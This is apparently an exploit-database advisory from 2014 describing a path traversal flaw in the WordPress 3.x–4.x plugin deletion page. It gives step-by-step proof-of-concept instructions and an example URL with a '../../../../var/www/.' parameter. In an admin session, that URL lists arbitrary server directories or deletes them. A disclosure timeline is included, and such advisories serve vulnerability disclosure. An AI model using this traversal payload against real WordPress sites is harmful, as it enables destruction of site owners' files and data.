WordPress 3.x, 4.x Path Traversal + Directory Listing + File Deletion Vulnerabilities

######################

# Exploit Title : WordPress 3.x, 4.x Path Traversal + Directory Listing + File Deletion Vulnerabilities

# Exploit Author : Claudio Viviani

# Vendor Homepage : https://wordpress.org

# Software Link : http://wordpress.org/wordpress-3.9.2.tar.gz

# Date : 2014-07-11

# Tested on : Mozilla Firefox / WordPress 4.0 beta 1
#             Mozilla Firefox / WordPress 4.0 beta 2
#             Mozilla Firefox / WordPress 4.0 beta 3
#             Mozilla Firefox / WordPress 3.9.2
#             Mozilla Firefox / WordPress 3.9.1
#             Mozilla Firefox / WordPress 3.8
#             Mozilla Firefox / WordPress 3.7

######################

# Location : 
 
http://victim/wp-admin/plugins.php

######################

# Description :

An admin user could read directories contents or delete writable directories.

######################

# PoC Path Traversal + Directory Listing

1) Choose a plugin

2) Click on "Deactivate" and "Delete" buttons

3) Replace plugin location with target directory in the url.
   
   Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245

4) Click on "Click to view entire list of files which will be delete" link.



# PoC Path Traversal + File Deletion (WARNING!!! The directories selected will be deleted!!!)

1) Choose a plugin

2) Click on "Deactivate" and "Delete" buttons

3) Replace plugin location with target directory in the url.
   
   Example: http://localhost/wp-admin/plugins.php?action=delete-selected&checked[0]=../../../../var/www/.&plugin_status=all&paged=1&s&_wpnonce=1154979245


4) Click on "Yes delete these files"



# PoC video is available at:

https://www.youtube.com/watch?v=yVtIA82ZJuA


######################

# Vulnerability Disclosure Timeline:

2014-07-10:  Discovered vulnerability
2014-07-10:  Vendor Notification (WordPress Security e-mail address)
2014-07-10:  Vendor Response/Feedback (Andrew Nacin - Lead Developer WordPress)
2014-08-06:  3.9.2 has been released but not fixed 
2014-08-06:  Public Disclosure 


#####################

Discovered By : Claudio Viviani
               http://www.homelab.it
        
               info@homelab.it
               homelabit@protonmail.ch

               https://www.facebook.com/homelabit
               https://twitter.com/homelabit
               https://plus.google.com/+HomelabIt1/
               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################